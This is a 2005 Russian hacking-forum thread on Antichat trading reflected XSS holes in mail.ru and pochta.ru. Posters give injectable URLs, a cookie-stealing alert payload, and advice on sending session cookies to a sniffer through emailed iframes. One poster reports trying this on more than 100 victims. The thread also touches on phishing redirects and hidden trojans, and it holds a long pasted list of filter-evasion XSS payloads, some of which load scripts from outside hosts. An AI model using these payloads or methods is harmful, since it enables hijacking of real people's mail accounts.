Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Новые ХСС на mail.ru и pochta.ru (https://forum.antichat.xyz/showthread.php?t=6654)

m0nzt3r 20.05.2005 11:43

Новые ХSS на mail.ru и pochta.ru
 
это на мэйл.ру
Код:

http://win.mail.ru/cgi-bin/rpopedit?Action=1&POPServer=ХСС_КОД_ЗДЕСЬ&POPUsername=null&POPPassword=null &WaitTime=1&KeepTime=2&NoFilter=&Folder=950
а это на почта.ру
Код:

http://www.pochta.ru/forgot.php?login=ХСС_КОД_1&domain=ХСС_КОД_2
как видите на почта ру есть сразу 2 хсс =)
источник ww.web-hack.ru

rsha1988 20.05.2005 22:44

Что эта ХСС дает и как ей пользоваться?
ХСС_КОД_ЗДЕСЬ -сюда примерно что вписывать?

m0nzt3r 20.05.2005 23:54

ну млин XSS не знаешь че такое....примерно впиши <script>alert();</script> и увидишь....можно перехватить сессию но я не знаю как и в описании баги тож не дается

rsha1988 21.05.2005 16:26

http://www.pochta.ru/forgot.php?logi...omain=front.ru
- это форма смены пароля!
И помойму она не чего не дает.?

m0nzt3r 21.05.2005 18:52

но в описании баги автор сказал что через нее можно перехватить сессии но я не понял как...если хочешь оригинал почитать то зайди на ВебХак

JazzzSummerMan 21.05.2005 19:25

да таких уязвимостей дофига и больше. Мы называем их пассивный Xss, потому что для проведения атаки надо заставить пользователя выполнить запрос

m0nzt3r 21.05.2005 19:42

а как можно чужуюю сессию перехватить?
типа оффтоп: Джазз а зачем у тебя под ником не Moderator а Morderator написано?)))))

JazzzSummerMan 21.05.2005 20:08

можно, но таким методом делать - геморой себе наживать.
Легче и надежнее просто отослать письмо с картинкой или фреймом с урл сниффера, и сессия будет перехвачена. только ты ей не воспользуешься чтобы зайти в ящик, потому что на почте.ру идет проверка по айпи. Надо чтобы действия исходили из браузера жертвы.. Ну как обычно вобщим.
про оффтоп: спасибо что сообщил, исправим. Шутка))))

m0nzt3r 21.05.2005 22:58

=)) короче опасность: минимальная ))) да и вобще самая неопасная дыра это ХСС )

про про оффтоп: =))) надеюся что админы увидели мое сообщение ))

KEZ 22.05.2005 10:55

Нефига писать то что написано на webhack

m0nzt3r 23.05.2005 23:00

а причем тут вебхак я просто источник указал,а что не надо было? да ты же знаешь что нас сама бага интересует

goblen 24.05.2005 15:30

ну вот эта http://win.mail.ru/cgi-bin/rpopedit?...PPassword=null &WaitTime=1&KeepTime=2&NoFilter=&Folder=950
не функционирует

а вот с другими похожими багами у меня проблема -
если ХСС будет посылать куку на снифер то если сходить по такой ссылке то кука нормально уходит на снифер, а вот если вставить такой адрес в невидимый фраме или ифраме то на снифер уходит только часть куки - я бы сказал часть всегда разная но никогда не целая. я проверил на >100 лохов и всегда получаеться только так - кука с открытого окна приходит целая а из фраме приходит только часть

вопрос как сделать правильно чтоб кука приходила целая из фраме?

m0nzt3r 24.05.2005 22:11

а ты что вставлял?

Xattab 02.06.2005 04:20

http://astral.mail.ru/natal.php?day=444&month=444&year=444&hour=444&minu t=<script>alert(document.cookie)</script>&Submit=Go

Егорыч+++ 02.06.2005 09:36

это конечно все хорошо... но http://astral.mail.ru/ и http://mail.ru/ это разные домены... и украсть куки с домена http://mail.ru/ при помощи уязвимости XSS http://astral.mail.ru/ нельзя.

KEZ 02.06.2005 13:01

Зато можно редиректнуть пользователя на страницу похожую на мейл ру и там попросить его ввести пароль. Хотя это больше ИДИОТСКАЯ сой. инженерия, сгореть ей в аду

JazzzSummerMan 02.06.2005 15:58

гоблен может это от того что src во фреймах в IE не могут содержать больше некоторого кол-ва символов?(дальше будут ошибки, вплоть до переполнения буфера)
(Хотя скорее всего здесь что-то другое)

antiox 02.06.2005 20:32

Цитата:

это конечно все хорошо... но http://astral.mail.ru/ и http://mail.ru/ это разные домены... и украсть куки с домена http://mail.ru/ при помощи уязвимости XSS http://astral.mail.ru/ нельзя.
Егорыч, вот это согласись, ты написал - ЛОЛ!
Кстати, во-первых, баги, которые на веб-хаке опубликовали - это я нашел.(там директ на мой сайт есть), во-вторых, у меня есть еще около 5 свежих XSS багов там же! Далее, специально для Егорыча=))
Если у нас есть куки с www.mail.ru, а на astral.mail.ru есть XSS-баг, то куки с мейла БУДУТ выводится!!! Если не веришь, стукни мне в асю - 440043=)) Жду=)

markz05 02.06.2005 23:09

Багу на http://astral.mail.ru/ вообще по моему www.asteam.org первые нашли.

JazzzSummerMan 03.06.2005 16:36

antiox
продемонстрируйте нам раз такое дело...
А вобще лол не там где Егорыч написал, а в том, что вы суетитесь мол "это ниибаццо мы первые нашли, а не они и хз и тд и провавры"
<МАТ> нашли.


пожалуста, не пишите матом - это некрасиво

RuSSo 03.06.2005 17:58

Надо багу use пока не прикрыта, а не суетиться и искать на кого запатентована бага :)

antiox 04.06.2005 17:17

JazzzSummerMan
Без проблем продемонстрирую! Я сам удивился, когда увидел, что эти дибилы на мейле установили привязку куков к основному домену, т.е. на поддоменах они тоже работают! Я ж сказал, сточи в асю 440043 !! Безз проблем все покажу

JazzzSummerMan 05.06.2005 22:32

вобще-то да. есть такое. Через чат потому что в ящики заходили, верно.
Но все же я продолжаю утверждать что такие xss , которые требуют принудительного выполнения в браузере жертвы не очень эффективны)).

goblen 06.06.2005 15:26

Цитата:

Сообщение от JazzzSummerMan
гоблен может это от того что src во фреймах в IE не могут содержать больше некоторого кол-ва символов?(дальше будут ошибки, вплоть до переполнения буфера)
(Хотя скорее всего здесь что-то другое)

я вообще то раньше этим методом не интересовался но сейчас вижу что это очень продуктивный метод для некоторых применений

попробуй зайти в свой почтовый ящик на майл ру и в другом окне открыть чат. и попробуй открыть окно со с фраме котороя будет содержать тотже чат. я думаю что из фраме добраться можно только до кук которые были записаны в этот фраме а к кукам что уже есть на компе фраме не имеет доступа.

censored! 06.06.2005 16:14

Цитата:

Но все же я продолжаю утверждать что такие xss , которые требуют принудительного выполнения в браузере жертвы не очень эффективны
Почему? Это один из способов.

p.s. Форум IdealBB в куках хранит не зашифрованный пароль. =)

JazzzSummerMan 07.06.2005 00:41

Гоблен не совсем понял что ты имел ввиду, но эта тема уже из разряда политики безопасности cookies вроде, тут есть как общепринятые правила, так и методы обхода защиты хм

Цитата:

Сообщение от censored!
Почему? Это один из способов.

p.s. Форум IdealBB в куках хранит не зашифрованный пароль. =)

Согласен что один из способов, но активный xss проще в использовании и легче ищется.
про IdealBB знамо дело, если комп запомнен, то пасс сохранен
http://antichat.ru/txt/idealbb/

goblen 07.06.2005 13:28

Цитата:

Сообщение от JazzzSummerMan
Гоблен не совсем понял что ты имел ввиду, но эта тема уже из разряда политики безопасности cookies вроде, тут есть как общепринятые правила, так и методы обхода защиты хм

ты знаешь как обойти эту проблему? я применил два не очень красивых способа - открывать попуп с ххс или с левой страницы посылать на страницу с ххс который не только п**дит куки но и переадресовывает на беспонтовую другую страницу.

goblen 07.06.2005 13:33

да и чисто поясню
письмами со скриптом можно на***вать только нестолкнувшихся с таким феноменом людей, а вот бывалые пострадавшие никогда неоткроют никакое письмо через веб- они сейчас все пользуються разной х**той типо оутлоок или бат или еще че нибудь.

RuSSo 08.06.2005 02:46

Цитата:

Ты знаешь как обойти эту проблему? я применил два не очень красивых способа - открывать попуп с ххс или с левой страницы посылать на страницу с ххс который не только п**дит куки но и переадресовывает на беспонтовую другую страницу.
Это применили ешё до тебя 3 года назад.

GreenBear 08.06.2005 12:06

оутлук\бат = трой -))
я щас сижу тока через веб, потому как сам начал занимаца троянами и знаю что можно сделать -)) даже не догадаешся то что его подцепил -))

JazzzSummerMan 08.06.2005 12:30

Расскажи нам)

GreenBear 08.06.2005 12:59

рассказать что?

goblen 08.06.2005 13:38

Цитата:

Сообщение от RuSSo
Это применили ешё до тебя 3 года назад.

если ты знаешь какойнибудь способ который кто применил 3 года назад так ты его сюда выложи

JazzzSummerMan 08.06.2005 13:54

Цитата:

Сообщение от Green_Bear
оутлук\бат = трой -))
я щас сижу тока через веб, потому как сам начал занимаца троянами и знаю что можно сделать -)) даже не догадаешся то что его подцепил -))

имею ввиду расскажи незаметные способы протроянить через аутлук или бэт

GreenBear 09.06.2005 16:21

читай внимательнее. троян.
если *.exe не палит антивирь, не факт то, что это не троян. Трояны могут быть в программе, которой ты сам разрешишь доступ в веб, например какой нить мэйл флудер или чат-крякер. спрятать его труда не состовляет.

goblen 10.06.2005 00:32

а JaVaScRiPt убрали, вчера работало а сегодня нет уже.


JazzzSummerMan ты знаешь альтернативу?

JazzzSummerMan 10.06.2005 14:03

Цитата:

Сообщение от Green_Bear
читай внимательнее. троян.
если *.exe не палит антивирь, не факт то, что это не троян. Трояны могут быть в программе, которой ты сам разрешишь доступ в веб, например какой нить мэйл флудер или чат-крякер. спрятать его труда не состовляет.

я внимательно читаю
Какая разница палится или нет прога антивирусом, как они работают и тд. Это EXE. В новых версиях Бэт вообще нельзя её открыть из самого клиента без предварительного сохранения на диске. И где здесь то что ты назвал "подцепить троян и не заметить"?
Думал что у тебя есть способы обхода ограничений в потовых клиентах.

JazzzSummerMan 10.06.2005 14:10

Гоблен вот тебе программа от LittleLamer для тестирования почты на XSS, скачай её, сразу разберешься что к чему, и мне кажется что ты сразу найдешь кучу альтернатив

http://forum.antichat.ru/attachment.php?attachmentid=71

goblen 10.06.2005 14:53

ну ты сам хоть знаешь альтернативу?
а little lamer молодец набрал много вариантов тока зачем там програмка если и так все это можно послать?

и вот что получается:

<font face="Verdana" size=3 color=maroon>XSS</font><font face="Verdana" size=2 color=green> security tester v1.1</font><br>
<xscript><!-- alert(1) --></xscript>
<xscript src=http://xsstest.narod.ru/2.js><!-- --></xscript>
<xbody filtered-onLoad=alert(2)>
<xbody filtered-onlOaD=alert(3)>

<image src=http://xsstest.narod.ru/1.jpg filtered-onload=alert(5)>
<image src=http://xsstest.narod.ru/1.jpg filtered-onlOaD=alert(6)>
<image src=xjavascript:alert(7)>
<image src="" filtered-onerror=alert(8)>
<image src='' filtered-onerror=alert(9)>
<img src="" filtered-onerror=alert(10)>
<img src='' filtered-onerror=alert(11)>
<xembed src=xjavascript:alert(12);this.avi>
<xembed src=xjavascript:alert(13);this.wav>
<img src=http://jstest.narod.ru/1.jpg filtered-onload=alert(14)>
<img src=http://jstest.narod.ru/1.jpg filtered-onlOaD=alert(15)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(17))>
<span xstyle=background:url(xjavascript:alert(18))></span>
<hr xstyle=top:expression(alert(19))>
<span xstyle=top:expression(alert(20))></span>
<span sss="alert(21);this.sss=null" xstyle=top:expression(eval(this.sss));></span>
<span sss='alert(22);this.sss=null' xstyle=top:expression(eval(this.sss));></span>
<span sss=alert(23);this.sss=null xstyle=top:expression(eval(this.sss));></span>
<hr sss="alert(24);this.sss=null" xstyle=top:expression(eval(this.sss));>
<hr sss='alert(25);this.sss=null' xstyle=top:expression(eval(this.sss));>
<hr sss=alert(26);this.sss=null xstyle=top:expression(eval(this.sss));>
<xstyle type="text/css"><!-- @import url(javascript:alert(27)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(28)></xobject>
<xiframe src=xjavascript:alert(29)>
<a href=xjavascript:alert(30) target="_blank">click me</a>

<image src=xvbscript:alert(32)>
<xembed src=xvbscript:alert(33);this.avi>
<xembed src=xvbscript:alert(34);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xvbscript:alert(36))>
<span xstyle=background:url(xvbscript:alert(37))></span>
<xstyle type="text/css"><!-- @import url(vbscript:alert(38)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xvbscript:alert(39)></xobject>
<xiframe src=xvbscript:alert(40)>
<a href=xvbscript:alert(41) target="_blank">click me</a>

<image src=xjavascript:alert(43)>
<xembed src=xjavascript:alert(44);this.avi>
<xembed src=xjavascript:alert(45);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(47))>
<span xstyle=background:url(xjavascript:alert(48))></span>
<xstyle type="text/css"><!-- @import url(&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert(49)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(50)></xobject>
<xiframe src=xjavascript:alert(51)>
<a href=xjavascript:alert(52) target="_blank">click me</a>

<image src=xjavascript:alert(54)>
<xembed src=xjavascript:alert(55);this.avi>
<xembed src=xjavascript:alert(56);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(58))>
<span xstyle=background:url(xjavascript:alert(59))></span>
<xstyle type="text/css"><!-- @import url(javascript&#9:alert(60)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(61)></xobject>
<xiframe src=xjavascript:alert(62)>
<a href=xjavascript:alert(63) target="_blank">click me</a>

<image src=xjavascript:alert(65)>
<xembed src=xjavascript:alert(66);this.avi>
<xembed src=xjavascript:alert(67);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(69))>
<span xstyle=background:url(xjavascript:alert(70))></span>
<xstyle type="text/css"><!-- @import url(javascript&#10:alert(71)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(72)></xobject>
<xiframe src=xjavascript:alert(73)>
<a href=xjavascript:alert(74) target="_blank">click me</a>

<image src=xjavascript:alert(76)>
<xembed src=xjavascript:alert(77);this.avi>
<xembed src=xjavascript:alert(78);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(80))>
<span xstyle=background:url(xjavascript:alert(81))></span>
<xstyle type="text/css"><!-- @import url(javascript&#13:alert(82)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(83)></xobject>
<xiframe src=xjavascript:alert(84)>
<a href=xjavascript:alert(85) target="_blank">click me</a>

<image src=xjavascript:alert(87)>
<xembed src=xjavascript:alert(88);this.avi>
<xembed src=xjavascript:alert(89);this.wav>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif">
<hr xstyle=background:url(xjavascript:alert(91))>
<span xstyle=background:url(xjavascript:alert(92))></span>
<xstyle type="text/css"><!-- @import url(javascript :alert(93)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(94)></xobject>
<xiframe src=xjavascript:alert(95)>
<a href=xjavascript:alert(96) target="_blank">click me</a>



<image src=xjavascript:alert(98)>

<xembed src=xjavascript:alert(99);this.avi>

<xembed src=xjavascript:alert(100);this.wav>

<img src="http://img.mail.ru/mail/ru/images/dumb.gif">

<hr xstyle=background:url(xjavascript:alert(102))>

<span xstyle=background:url(xjavascript:alert(103))></span>
<xstyle type="text/css"><!-- @import url(javascript
:alert(104)); --></xstyle>
<xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
<param name=url value=xjavascript:alert(105)></xobject>


<xiframe src=javascript <a href=xjavascript:alert(106)>click me</a>
<image src="" filtered-onERror=alert(107)>
<image src='' filtered-onERror=alert(108)>
<img src="" filtered-onERror=alert(109)>
<img src='' filtered-onERror=alert(110)>
<image src=""filtered-onerror=alert(111)>
<image src=''filtered-onerror=alert(112)>
<img src=""filtered-onerror=alert(113)>
<img src=''filtered-onerror=alert(114)>
<image src=""filtered-onErRor=alert(115)>
<image src=''filtered-onErRor=alert(116)>
<img src=""filtered-onErRor=alert(117)>
<img src=''filtered-onErRor=alert(118)>
<image src="a"filtered-onError=alert(119)>
<image src='a'filtered-onError=alert(120)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onError=alert(121)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onError=alert(122)>
<image src="a"filtered-onErRor=alert(123)>
<image src='a'filtered-onERror=alert(124)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(125)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(126)>
<image src="a" filtered-onErRor=alert(127)>
<image src='a' filtered-onErRor=alert(128)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif" filtered-onErRor=alert(129)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif" filtered-onErRor=alert(130)>
<image src="a"filtered-onerror=alert(131)>
<image src='a'filtered-onerror=alert(132)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onerror=alert(133)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onerror=alert(134)>
<image src="a"filtered-onErRor=alert(135)>
<image src='a'filtered-onErRor=alert(136)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(137)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(138)>


так что эти приколы уже непойдут.

да и ты знаешь можно ли как нибудь технично яваскриптом вставить левый реферер? я нет и приходится делать это через цги. скажи если знаешь.

JazzzSummerMan 10.06.2005 15:24

Цитата:

Сообщение от goblen
ну ты сам хоть знаешь альтернативу?

Не знаю, потому что не собирался искать без надобности
Цитата:

зачем там програмка если и так все это можно послать?
Можно и так посылать, но во-первых СМТП-шник готовый есть, который в хтмл шлет), а во-вторых процесс автоматизируется, для всяких почт можно сразу использовать. и со своими настройками.

Цитата:

так что эти приколы уже непойдут.
Ты же понимаешь принцип обхода фильтров. Так найди свои приколы, тема не новая, кто за тебя будет рутиной заниматься хм..

Цитата:

да и ты знаешь можно ли как нибудь технично яваскриптом вставить левый реферер? я нет и приходится делать это через цги. скажи если знаешь.
явоскриптом никак нельзя имхо , реф на уровне заголовков все-таки.
Тебе это нужно чтобы настроить пересылку в почте, верно? Есть кое-какие соображения. поделюсь позже, если получится


Время: 18:10